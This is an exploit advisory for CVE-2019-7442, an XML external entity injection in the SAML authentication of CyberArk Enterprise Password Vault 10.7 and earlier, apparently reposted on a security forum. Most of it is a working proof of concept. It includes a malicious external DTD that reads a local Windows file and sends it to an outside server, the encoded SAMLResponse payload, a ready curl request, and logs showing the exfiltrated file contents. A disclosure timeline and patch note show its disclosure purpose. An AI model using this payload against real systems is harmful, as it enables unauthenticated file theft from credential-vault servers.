CyberArk Enterprise Password Vault 10.7 XML External Entity Injection

  1. 4 months ago

    h124.png

    CyberArk Enterprise Password Vault versions 10.7 and below suffer from an XML external entity injection vulnerability.

    MD5 | 2fcef14fc23d98113b12f2f58e26f8ef

    Download => cyberarkepv107-xml.txt

    # Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML
    authentication
    # Date: 10/05/2019
    # Exploit Author: Marcelo Toran (@spamv)
    # Vendor Homepage: https://www.cyberark.com
    # Version: <=10.7
    # CVE : CVE-2019-7442
    
    
    -----------Product description
    The CyberArk Enterprise Password Vault is a privileged access security
    solution to store, monitor and rotate credentials. The main objective
    of the solution is protecting the privileged accounts that are used to
    administrate the systems of the organisations.
    
    -----------Vulnerability description
    This vulnerability allows remote attackers to disclose sensitive
    information or potentially bypass the authentication system.
    
    -----------Vulnerability Details
    # Exploit Title: XML External Entity (XXE) Injection in SAML authentication
    # Affected Component: Password Vault Web Access (PVWA)
    # Affected Version: <=10.7
    # Vendor: CyberArk
    # Vendor Homepage: https://www.cyberark.com
    # Date: 18/12/2018
    # CVSS Base Score: 7.5 (High)
    # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    # Exploit Author: Marcelo Torán (Nixu Corporation)
    # CVE: CVE-2019-7442
    # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442
    
    -----------Technical Description
    It has been found that the XML parser of the SAML authentication
    system of the Password Vault Web Access (PVWA) is vulnerable to XML
    External Entity (XXE) attacks via a crafted DTD. No user interaction
    or privileges are required as the vulnerability is triggered in
    pre-authentication.
    The vulnerable component is: https://example.com/PasswordVault/auth/saml
    The vulnerable argument: SAMLResponse
    
    -----------POC
    
    # pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration:
    <!ENTITY % data SYSTEM "file:///C:/Windows/win.ini">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>">
     
     
    # The malicious XML payload where is defined the address of the external entity defined in the previous step:
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd">
    %sp;
     
    %param1;
     
    ]>
    <r>&exfil;</r>
     
     
    # XML payload base64 encoded + equal symbols URL encoded:
    PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d
     
     
    # CURL command to exploit the XXE:
    curl -i -s -k  -X $'POST' \
        -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
        --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \
        $'https://example.com/PasswordVault/auth/saml/'
     
     
    # Checking the logs of the external server:
    example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 -
    example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 -
     
     
    # And decoding the content of the logs it's possible to read the requested file of the machine:
    ; for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1
    
    -----------Timeline
    18/12/2018 – Vulnerability discovered
    10/01/2019 – Vendor notified
    23/01/2019 – Vulnerability accepted
    05/02/2019 – CVE number requested
    05/02/2019 – CVE number assigned
    19/02/2019 – Vendor released a patch
    19/02/2019 – Advisory released
    
    -----------Proof of Concept (PoC)
    
    https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/
    
 

or Sign Up to reply!